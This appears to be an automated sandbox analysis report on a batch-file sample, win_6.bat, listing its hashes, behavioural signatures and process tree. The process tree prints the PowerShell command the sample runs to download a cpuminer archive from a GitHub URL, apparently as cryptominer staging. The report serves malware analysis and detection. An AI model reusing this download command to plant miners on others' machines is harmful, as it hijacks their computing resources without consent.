Overview
overview
10Static
static
1win.bat
windows10-1703-x64
10win_1.bat
windows10-1703-x64
10win_10.bat
windows10-1703-x64
10win_11.bat
windows10-1703-x64
10win_2.bat
windows10-1703-x64
10win_3.bat
windows10-1703-x64
10win_4.bat
windows10-1703-x64
10win_5.bat
windows10-1703-x64
10win_6.bat
windows10-1703-x64
10win_7.bat
windows10-1703-x64
10win_8.bat
windows10-1703-x64
10win_9.bat
windows10-1703-x64
10Analysis
-
max time kernel
380s -
max time network
1590s -
platform
windows10-1703_x64 -
resource
win10-20230621-en -
resource tags
arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system -
submitted
30-06-2023 14:47
Static task
static1
Behavioral task
behavioral1
Sample
win.bat
Resource
win10-20230621-en
Behavioral task
behavioral2
Sample
win_1.bat
Resource
win10-20230621-en
Behavioral task
behavioral3
Sample
win_10.bat
Resource
win10-20230621-en
Behavioral task
behavioral4
Sample
win_11.bat
Resource
win10-20230621-en
Behavioral task
behavioral5
Sample
win_2.bat
Resource
win10-20230621-en
Behavioral task
behavioral6
Sample
win_3.bat
Resource
win10-20230621-en
Behavioral task
behavioral7
Sample
win_4.bat
Resource
win10-20230621-en
Behavioral task
behavioral8
Sample
win_5.bat
Resource
win10-20230621-en
Behavioral task
behavioral9
Sample
win_6.bat
Resource
win10-20230621-en
Behavioral task
behavioral10
Sample
win_7.bat
Resource
win10-20230621-en
Behavioral task
behavioral11
Sample
win_8.bat
Resource
win10-20230621-en
Behavioral task
behavioral12
Sample
win_9.bat
Resource
win10-20230621-en
General
-
Target
win_6.bat
-
Size
706B
-
MD5
ddc05c409f627a4382bff4c3a49423df
-
SHA1
0f77ae481593bc1b0669dae7a044d0b96f39413f
-
SHA256
6daf93d284bd5d39f613d6d3f96c083d1b99baa10e7acbf65f74ab84fe551887
-
SHA512
0bdfacc137a0f40cfffa34d3549961fe20dc35905e14a9b5c207cab380594dff09dfe641a534fb0d3211bcce3b727801df8c7c635fbc9c0cd26d6e7914818cc3
Malware Config
Extracted
https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 2 2196 powershell.exe 4 2196 powershell.exe 7 2196 powershell.exe 9 2196 powershell.exe 14 2196 powershell.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 4752 2196 WerFault.exe 67 -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2196 powershell.exe 2196 powershell.exe 2196 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2196 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 5004 wrote to memory of 2196 5004 cmd.exe 67 PID 5004 wrote to memory of 2196 5004 cmd.exe 67
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_6.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2196 -s 26043⤵
- Program crash
PID:4752
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a